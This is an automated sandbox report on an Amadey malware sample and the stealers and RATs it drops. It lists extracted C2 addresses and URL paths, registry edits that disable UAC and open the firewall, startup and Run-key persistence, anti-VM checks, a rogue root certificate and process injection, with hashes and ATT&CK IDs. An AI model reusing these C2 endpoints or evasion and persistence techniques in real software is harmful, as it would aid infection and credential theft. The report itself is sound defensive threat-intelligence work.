amadey | c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585

Analysis

max time kernel
43s
max time network
148s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
07-05-2024 14:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b6be8ac990a242fb267ad389be0e9f80_NEAS.exe
Size

1.6MB
MD5

b6be8ac990a242fb267ad389be0e9f80
SHA1

b653d64cdd79b1e72240090ea8be0d2fe6626cda
SHA256

c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585
SHA512

d5c2a9adaee0bb79e2d025f6003fdd846b1c3be48990ec3422b8c6c06baea2c7a989b8bd8cb3ee4b95235e14ede84771bf46b6b883998edbde6cbe8c58323015
SSDEEP

24576:k6vpDCULtpzNh6vaS3IpKu7yuHqmbucbqAcaFhv/M6qSQzRt9B1OeAP4oKx3QgSX:k6vhCUL3zNUyYjcLrt3cRHBaIQ8QWw

Score

10^/10

amadey privateloader redline risepro zgrat test1234 discovery evasion execution infostealer loader persistence rat spyware stealer themida trojan

Malware Config

Extracted

Family

amadey

Version

4.20

http://193.233.132.139

Attributes

install_dir
5454e6f062
install_file
explorta.exe
strings_key
c7a869c5ba1d72480093ec207994e2bf
url_paths
/sev56rkm/index.php

rc4.plain

Extracted

Family

risepro

147.45.47.126:58709

Extracted

Family

amadey

Version

4.18

http://193.233.132.56

Attributes

install_dir
09fd851a4f
install_file
explorha.exe
strings_key
443351145ece4966ded809641c77cfa8
url_paths
/Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

redline

Botnet

Test1234

185.215.113.67:26260

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 3 IoCs

resource	yara_rule
behavioral1/memory/3644-1133-0x0000000000850000-0x0000000004084000-memory.dmp	family_zgrat_v1
behavioral1/memory/3644-1138-0x000000001EE90000-0x000000001EF9A000-memory.dmp	family_zgrat_v1
behavioral1/memory/3644-1151-0x00000000005A0000-0x00000000005C4000-memory.dmp	family_zgrat_v1

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	Ag1awgRIajeR9leyGKSjkPbj.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000600000001749c-151.dat	family_redline
behavioral1/memory/2260-161-0x00000000008F0000-0x0000000000942000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Ag1awgRIajeR9leyGKSjkPbj.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	b6be8ac990a242fb267ad389be0e9f80_NEAS.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amert.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	fe69476dba.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4024	powershell.exe
3504	powershell.exe
3288	powershell.exe
3484	powershell.exe
3856	powershell.exe
2656	powershell.exe
3192	powershell.exe
2152	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3948	netsh.exe
2044	netsh.exe
2168	netsh.exe
1496	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	fe69476dba.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	fe69476dba.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b6be8ac990a242fb267ad389be0e9f80_NEAS.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b6be8ac990a242fb267ad389be0e9f80_NEAS.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Ag1awgRIajeR9leyGKSjkPbj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Ag1awgRIajeR9leyGKSjkPbj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe

Drops startup file 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LHI0byYxbieC8jXsfxioT94P.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lLEg3CvBF4AgYjBWWCeAmX3g.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vT2LoTdStwKRvxcmaUxzwGKp.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uyvVo8X5Oty6IkEqR2tu7hZS.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2i5OskVmxtcdzYc2Cr56642w.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MGzwmTMuFSXgUUUF7gl1XTGL.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fEz7VcVbWGXXUlvmPH31OuC8.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MWaJNqmTO94ukYjsPscWmjKc.bat	jsc.exe

Executes dropped EXE 24 IoCs

pid	Process
2708	explorta.exe
2456	explorta.exe
2212	amert.exe
1464	explorha.exe
908	swiiiii.exe
2260	jok.exe
2540	swiiii.exe
2304	file300un.exe
1072	fe69476dba.exe
1476	jqPn5t9LvZatm4hVNwHWDvPr.exe
1456	gold.exe
2028	XmVVwEtTyZOq3ELWjxF2eWhb.exe
2232	hlurZ0PM1Vh26mj8EbbMSmWB.exe
3048	wsCTI7FobPiFWgRKIatjDe9Q.exe
2868	u150.0.exe
996	iipVM7vSx35UZtAKztyz66v6.exe
2024	233128b1d4.exe
2556	wsCTI7FobPiFWgRKIatjDe9Q.exe
3444	Ag1awgRIajeR9leyGKSjkPbj.exe
3416	alexxxxxxxx.exe
3516	u150.1.exe
4044	iipVM7vSx35UZtAKztyz66v6.exe
3936	XmVVwEtTyZOq3ELWjxF2eWhb.exe
4060	hlurZ0PM1Vh26mj8EbbMSmWB.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Wine	amert.exe
Key opened	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Wine	explorta.exe

Loads dropped DLL 54 IoCs

pid	Process
2728	b6be8ac990a242fb267ad389be0e9f80_NEAS.exe
2708	explorta.exe
2708	explorta.exe
2212	amert.exe
1464	explorha.exe
2360	WerFault.exe
2360	WerFault.exe
2360	WerFault.exe
2360	WerFault.exe
2360	WerFault.exe
1464	explorha.exe
1464	explorha.exe
1464	explorha.exe
1464	explorha.exe
1568	WerFault.exe
1568	WerFault.exe
1568	WerFault.exe
1568	WerFault.exe
1568	WerFault.exe
2708	explorta.exe
1112	jsc.exe
1464	explorha.exe
1464	explorha.exe
1112	jsc.exe
1112	jsc.exe
1112	jsc.exe
1112	jsc.exe
1112	jsc.exe
1112	jsc.exe
1476	jqPn5t9LvZatm4hVNwHWDvPr.exe
1476	jqPn5t9LvZatm4hVNwHWDvPr.exe
1476	jqPn5t9LvZatm4hVNwHWDvPr.exe
1476	jqPn5t9LvZatm4hVNwHWDvPr.exe
1112	jsc.exe
1112	jsc.exe
2708	explorta.exe
1464	explorha.exe
1464	explorha.exe
1112	jsc.exe
1476	jqPn5t9LvZatm4hVNwHWDvPr.exe
1476	jqPn5t9LvZatm4hVNwHWDvPr.exe
1476	jqPn5t9LvZatm4hVNwHWDvPr.exe
1476	jqPn5t9LvZatm4hVNwHWDvPr.exe
3788	WerFault.exe
3788	WerFault.exe
3788	WerFault.exe
3376	rundll32.exe
3376	rundll32.exe
3376	rundll32.exe
3376	rundll32.exe
2508	rundll32.exe
2508	rundll32.exe
2508	rundll32.exe
2508	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 27 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/2728-2-0x0000000000CD0000-0x00000000011C8000-memory.dmp	themida
behavioral1/memory/2728-5-0x0000000000CD0000-0x00000000011C8000-memory.dmp	themida
behavioral1/memory/2728-6-0x0000000000CD0000-0x00000000011C8000-memory.dmp	themida
behavioral1/memory/2728-4-0x0000000000CD0000-0x00000000011C8000-memory.dmp	themida
behavioral1/memory/2728-3-0x0000000000CD0000-0x00000000011C8000-memory.dmp	themida
behavioral1/memory/2728-1-0x0000000000CD0000-0x00000000011C8000-memory.dmp	themida
behavioral1/memory/2728-0-0x0000000000CD0000-0x00000000011C8000-memory.dmp	themida
behavioral1/memory/2728-7-0x0000000000CD0000-0x00000000011C8000-memory.dmp	themida
behavioral1/memory/2708-27-0x0000000001270000-0x0000000001768000-memory.dmp	themida
behavioral1/memory/2708-28-0x0000000001270000-0x0000000001768000-memory.dmp	themida
behavioral1/memory/2708-26-0x0000000001270000-0x0000000001768000-memory.dmp	themida
behavioral1/memory/2708-25-0x0000000001270000-0x0000000001768000-memory.dmp	themida
behavioral1/memory/2708-24-0x0000000001270000-0x0000000001768000-memory.dmp	themida
behavioral1/memory/2708-23-0x0000000001270000-0x0000000001768000-memory.dmp	themida
behavioral1/memory/2708-22-0x0000000001270000-0x0000000001768000-memory.dmp	themida
behavioral1/memory/2708-21-0x0000000001270000-0x0000000001768000-memory.dmp	themida
behavioral1/memory/2728-20-0x0000000000CD0000-0x00000000011C8000-memory.dmp	themida
behavioral1/files/0x000800000001630b-18.dat	themida
behavioral1/memory/2456-49-0x0000000001270000-0x0000000001768000-memory.dmp	themida
behavioral1/memory/2708-80-0x0000000001270000-0x0000000001768000-memory.dmp	themida
behavioral1/memory/2708-110-0x0000000001270000-0x0000000001768000-memory.dmp	themida
behavioral1/files/0x0006000000016e94-260.dat	themida
behavioral1/memory/1072-270-0x0000000000B90000-0x000000000120E000-memory.dmp	themida
behavioral1/memory/1112-612-0x000000000BE30000-0x000000000C747000-memory.dmp	themida
behavioral1/memory/3444-631-0x0000000140000000-0x0000000140917000-memory.dmp	themida
behavioral1/memory/1072-827-0x0000000000B90000-0x000000000120E000-memory.dmp	themida
behavioral1/memory/3444-848-0x0000000140000000-0x0000000140917000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\233128b1d4.exe = "C:\\Users\\Admin\\1000021002\\233128b1d4.exe"	explorta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\fe69476dba.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\fe69476dba.exe"	explorta.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	b6be8ac990a242fb267ad389be0e9f80_NEAS.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	fe69476dba.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Ag1awgRIajeR9leyGKSjkPbj.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
9	pastebin.com
11	pastebin.com

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
47	api.myip.com
71	ipinfo.io
72	ipinfo.io
44	api.myip.com
46	api.myip.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x00060000000192ef-513.dat	autoit_exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	Ag1awgRIajeR9leyGKSjkPbj.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	Ag1awgRIajeR9leyGKSjkPbj.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Ag1awgRIajeR9leyGKSjkPbj.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	Ag1awgRIajeR9leyGKSjkPbj.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
2456	explorta.exe
2212	amert.exe
1464	explorha.exe
3444	Ag1awgRIajeR9leyGKSjkPbj.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2708 set thread context of 2456	2708	explorta.exe	29
PID 908 set thread context of 3044	908	swiiiii.exe	35
PID 2540 set thread context of 2584	2540	swiiii.exe	43
PID 2304 set thread context of 1112	2304	file300un.exe	47

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explorha.job	amert.exe
File created	C:\Windows\Tasks\explorta.job	b6be8ac990a242fb267ad389be0e9f80_NEAS.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3616	sc.exe
332	sc.exe
1436	sc.exe
3412	sc.exe
3308	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
1936	3044	WerFault.exe	35
2360	908	WerFault.exe	33
3788	3416	WerFault.exe	73

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u150.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u150.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u150.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u150.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u150.0.exe

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3292	schtasks.exe
3380	schtasks.exe
3556	schtasks.exe
1916	schtasks.exe
3396	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	jok.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	jok.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2456	explorta.exe
2212	amert.exe
1464	explorha.exe
2152	powershell.exe
2260	jok.exe
2260	jok.exe
2260	jok.exe
2868	u150.0.exe
3048	wsCTI7FobPiFWgRKIatjDe9Q.exe
996	iipVM7vSx35UZtAKztyz66v6.exe
2028	XmVVwEtTyZOq3ELWjxF2eWhb.exe
2232	hlurZ0PM1Vh26mj8EbbMSmWB.exe
1800	chrome.exe
1800	chrome.exe
2028	XmVVwEtTyZOq3ELWjxF2eWhb.exe
2028	XmVVwEtTyZOq3ELWjxF2eWhb.exe
996	iipVM7vSx35UZtAKztyz66v6.exe
996	iipVM7vSx35UZtAKztyz66v6.exe
2232	hlurZ0PM1Vh26mj8EbbMSmWB.exe
2232	hlurZ0PM1Vh26mj8EbbMSmWB.exe

Suspicious use of AdjustPrivilegeToken 39 IoCs

description	pid	Process
Token: SeDebugPrivilege	2152	powershell.exe
Token: SeDebugPrivilege	1112	jsc.exe
Token: SeDebugPrivilege	2260	jok.exe
Token: SeDebugPrivilege	3048	wsCTI7FobPiFWgRKIatjDe9Q.exe
Token: SeImpersonatePrivilege	3048	wsCTI7FobPiFWgRKIatjDe9Q.exe
Token: SeDebugPrivilege	996	iipVM7vSx35UZtAKztyz66v6.exe
Token: SeImpersonatePrivilege	996	iipVM7vSx35UZtAKztyz66v6.exe
Token: SeDebugPrivilege	2028	XmVVwEtTyZOq3ELWjxF2eWhb.exe
Token: SeImpersonatePrivilege	2028	XmVVwEtTyZOq3ELWjxF2eWhb.exe
Token: SeDebugPrivilege	2232	hlurZ0PM1Vh26mj8EbbMSmWB.exe
Token: SeImpersonatePrivilege	2232	hlurZ0PM1Vh26mj8EbbMSmWB.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeDebugPrivilege	2028	XmVVwEtTyZOq3ELWjxF2eWhb.exe
Token: SeImpersonatePrivilege	2028	XmVVwEtTyZOq3ELWjxF2eWhb.exe
Token: SeDebugPrivilege	996	iipVM7vSx35UZtAKztyz66v6.exe
Token: SeImpersonatePrivilege	996	iipVM7vSx35UZtAKztyz66v6.exe
Token: SeDebugPrivilege	2232	hlurZ0PM1Vh26mj8EbbMSmWB.exe
Token: SeImpersonatePrivilege	2232	hlurZ0PM1Vh26mj8EbbMSmWB.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe
Token: SeShutdownPrivilege	1800	chrome.exe

Suspicious use of FindShellTrayWindow 55 IoCs

pid	Process
2728	b6be8ac990a242fb267ad389be0e9f80_NEAS.exe
2212	amert.exe
2024	233128b1d4.exe
2024	233128b1d4.exe
2024	233128b1d4.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
2024	233128b1d4.exe
2024	233128b1d4.exe
2024	233128b1d4.exe
2024	233128b1d4.exe
2024	233128b1d4.exe
2024	233128b1d4.exe
3516	u150.1.exe
3516	u150.1.exe
3516	u150.1.exe
3516	u150.1.exe
3516	u150.1.exe
3516	u150.1.exe
3516	u150.1.exe
2024	233128b1d4.exe
2024	233128b1d4.exe
2024	233128b1d4.exe

Suspicious use of SendNotifyMessage 51 IoCs

pid	Process
2024	233128b1d4.exe
2024	233128b1d4.exe
2024	233128b1d4.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
1800	chrome.exe
2024	233128b1d4.exe
2024	233128b1d4.exe
2024	233128b1d4.exe
2024	233128b1d4.exe
2024	233128b1d4.exe
2024	233128b1d4.exe
3516	u150.1.exe
3516	u150.1.exe
3516	u150.1.exe
3516	u150.1.exe
3516	u150.1.exe
3516	u150.1.exe
3516	u150.1.exe
2024	233128b1d4.exe
2024	233128b1d4.exe
2024	233128b1d4.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2728 wrote to memory of 2708	2728	b6be8ac990a242fb267ad389be0e9f80_NEAS.exe	28
PID 2728 wrote to memory of 2708	2728	b6be8ac990a242fb267ad389be0e9f80_NEAS.exe	28
PID 2728 wrote to memory of 2708	2728	b6be8ac990a242fb267ad389be0e9f80_NEAS.exe	28
PID 2728 wrote to memory of 2708	2728	b6be8ac990a242fb267ad389be0e9f80_NEAS.exe	28
PID 2708 wrote to memory of 2456	2708	explorta.exe	29
PID 2708 wrote to memory of 2456	2708	explorta.exe	29
PID 2708 wrote to memory of 2456	2708	explorta.exe	29
PID 2708 wrote to memory of 2456	2708	explorta.exe	29
PID 2708 wrote to memory of 2456	2708	explorta.exe	29
PID 2708 wrote to memory of 2456	2708	explorta.exe	29
PID 2708 wrote to memory of 2456	2708	explorta.exe	29
PID 2708 wrote to memory of 2456	2708	explorta.exe	29
PID 2708 wrote to memory of 2456	2708	explorta.exe	29
PID 2708 wrote to memory of 2456	2708	explorta.exe	29
PID 2708 wrote to memory of 2456	2708	explorta.exe	29
PID 2708 wrote to memory of 2456	2708	explorta.exe	29
PID 2708 wrote to memory of 2456	2708	explorta.exe	29
PID 2708 wrote to memory of 2212	2708	explorta.exe	31
PID 2708 wrote to memory of 2212	2708	explorta.exe	31
PID 2708 wrote to memory of 2212	2708	explorta.exe	31
PID 2708 wrote to memory of 2212	2708	explorta.exe	31
PID 2212 wrote to memory of 1464	2212	amert.exe	32
PID 2212 wrote to memory of 1464	2212	amert.exe	32
PID 2212 wrote to memory of 1464	2212	amert.exe	32
PID 2212 wrote to memory of 1464	2212	amert.exe	32
PID 1464 wrote to memory of 908	1464	explorha.exe	33
PID 1464 wrote to memory of 908	1464	explorha.exe	33
PID 1464 wrote to memory of 908	1464	explorha.exe	33
PID 1464 wrote to memory of 908	1464	explorha.exe	33
PID 1464 wrote to memory of 908	1464	explorha.exe	33
PID 1464 wrote to memory of 908	1464	explorha.exe	33
PID 1464 wrote to memory of 908	1464	explorha.exe	33
